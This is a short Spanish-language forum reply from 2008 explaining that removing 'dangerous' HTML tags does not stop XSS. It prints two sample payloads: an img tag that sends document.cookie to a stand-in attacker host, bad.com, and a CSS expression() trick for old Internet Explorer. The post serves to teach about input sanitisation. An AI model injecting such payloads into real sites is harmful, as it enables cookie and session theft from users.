Ver Mensaje Individual
  #7 (permalink)  
Antiguo 26/11/2008, 10:05
Avatar de pateketrueke
pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años, 1 mes
Puntos: 2534
Respuesta: Inhabilitar todo lo no-html

hola... se dice, que a pesar de eliminar los tags "perjudiciales" aun pueden meterte algún código XSS y pueden ejecutarlo, osea... javascript

mira este ejemplo, demás te sugiero investigues el tema...

Código HTML:
<img src="document.location.href='http://bad.com/a/page.php?'+document.cookie;"/>
<span style="color:expresion(alert(true))">foo</span> 
el segundo solo funciona en IE, pero bueno....

suerte!
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.